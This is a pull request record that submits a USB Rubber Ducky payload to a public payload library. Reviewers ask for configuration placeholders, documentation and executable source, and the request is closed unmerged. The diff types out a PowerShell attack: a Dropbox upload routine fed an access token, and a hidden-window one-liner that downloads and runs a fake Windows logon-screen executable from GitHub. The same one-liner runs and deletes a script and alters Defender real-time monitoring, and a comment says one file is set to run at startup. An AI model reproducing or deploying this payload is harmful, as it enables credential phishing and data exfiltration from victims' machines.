### PR TITLE
Create payload.txt

### PR DESCRIPTION
**Pull request by Potential-Threat**

### CODE REVIEW

File: payloads/library/phishing/FakeWindowsLogin/payload.txt [hunk 1]
```diff
@@ -0,0 +1,87 @@
...
+ENTER
+STRING [Parameter(Mandatory=$true, ValueFromPipeline=$true)]
+ENTER
+STRING [Alias('f')]
+ENTER
+STRING [string]$SourceFilePath
+ENTER
+STRING )
+ENTER
+STRING $DropBoxAccessToken = 'YOUR_ACCESS_TOKEN_HERE'
```
Comment (dallaswinger) [inline payloads/library/phishing/FakeWindowsLogin/payload.txt:45]: please use `DEFINE` https://github.com/hak5/usbrubberducky-payloads#payload-configuration

File: payloads/library/phishing/FakeWindowsLogin/payload.txt [hunk 2]
```diff
@@ -0,0 +1,87 @@
+DELAY 500
+REM Ducky Script to download and run files, and set one to run at startup once
```
Comment (dallaswinger) [inline payloads/library/phishing/FakeWindowsLogin/payload.txt:2]: some instructions on how this should be configured by an end user etc would be appreciated

https://github.com/hak5/usbrubberducky-payloads#payload-documentation

Comment (dallaswinger) [reply payloads/library/phishing/FakeWindowsLogin/payload.txt:2]: This is still unresolved

File: payloads/library/phishing/FakeWindowsLogin/payload.txt [hunk 3]
```diff
@@ -0,0 +1,87 @@
...
+ENTER
+DELAY 500
+REM Close Notepad
+ALT f
+DELAY 500
+STRING x
+DELAY 500
+
+REM Download and execute the .exe file
+STRING powershell -w h $url = 'https://github.com/Potential-Threat/Ducky-script-Fake-Windows-Logon/blob/main/FakeLogonScreenToFile.exe?raw=true'; $output = 'C:\Windows\Temp\your_file.exe'; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -Wait; ./script.ps1 -Wait; Remove-Item './script.ps1' -Wait; Set-MpPreference -DisableRealtimeMonitoring $false; exit
```
Comment (hak5darren) [inline payloads/library/phishing/FakeWindowsLogin/payload.txt:86]: @Potential-Threat if linking to an executable, its source should be included and the link should be referenced by a DEFINE set to example.com

**Comment by dallaswinger** [comment]
reopen with requested changes if youd still like to submit.

**Pull request closed without merging**